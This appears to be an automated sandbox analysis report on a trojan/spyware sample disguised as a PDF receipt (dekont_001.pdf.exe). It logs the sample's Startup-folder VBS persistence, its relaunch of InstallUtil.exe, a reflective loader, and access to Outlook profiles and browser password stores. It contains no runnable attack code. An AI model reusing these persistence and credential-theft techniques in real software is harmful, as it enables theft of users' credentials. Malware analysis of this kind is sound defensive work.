Source: 0.2.dekont_001.pdf.exe.404a558.6.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.dekont_001.pdf.exe.404a558.6.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.dekont_001.pdf.exe.409a578.3.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.dekont_001.pdf.exe.409a578.3.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.dekont_001.pdf.exe.404a558.6.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.dekont_001.pdf.exe.5e30000.8.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.dekont_001.pdf.exe.5e30000.8.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.dekont_001.pdf.exe.404a558.6.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.dekont_001.pdf.exe.404a558.6.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.dekont_001.pdf.exe.404a558.6.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.dekont_001.pdf.exe.5e30000.8.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.dekont_001.pdf.exe.5e30000.8.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.dekont_001.pdf.exe.5e30000.8.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.dekont_001.pdf.exe.409a578.3.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs"

Source: dekont_001.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: dekont_001.pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: InstallUtil.exe, 00000001.00000002.2934160902.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2934160902.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.0000000003398000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000033B6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2933316783.00000000033A8000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: dekont_001.pdf.exe

ReversingLabs: Detection: 28%

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

File read: C:\Users\user\Desktop\dekont_001.pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\dekont_001.pdf.exe "C:\Users\user\Desktop\dekont_001.pdf.exe"
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Id.exe "C:\Users\user\AppData\Roaming\Id.exe"
Source: C:\Users\user\AppData\Roaming\Id.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Id.exe "C:\Users\user\AppData\Roaming\Id.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\dekont_001.pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Id.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\dekont_001.pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: dekont_001.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: dekont_001.pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: dekont_001.pdf.exe, 00000000.00000002.1761092855.000000000320D000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1768060486.000000000409A000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1769389020.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000004022000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1946252341.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.0000000003312000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: dekont_001.pdf.exe, dekont_001.pdf.exe, 00000000.00000002.1761092855.000000000320D000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1768060486.000000000409A000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1769389020.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1768060486.0000000004022000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1946252341.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 00000004.00000002.1927771292.0000000003312000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: dekont_001.pdf.exe, 00000000.00000002.1772053391.0000000006B60000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: dekont_001.pdf.exe, Mrnxhfixfwz.cs	.Net Code: Kqcmkdfcpw System.Reflection.Assembly.Load(byte[])
Source: Id.exe.0.dr, Mrnxhfixfwz.cs	.Net Code: Kqcmkdfcpw System.Reflection.Assembly.Load(byte[])
Source: 0.2.dekont_001.pdf.exe.3261198.1.raw.unpack, Mrnxhfixfwz.cs	.Net Code: Kqcmkdfcpw System.Reflection.Assembly.Load(byte[])
Source: 0.2.dekont_001.pdf.exe.5e30000.8.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.dekont_001.pdf.exe.5e30000.8.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.dekont_001.pdf.exe.5e30000.8.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
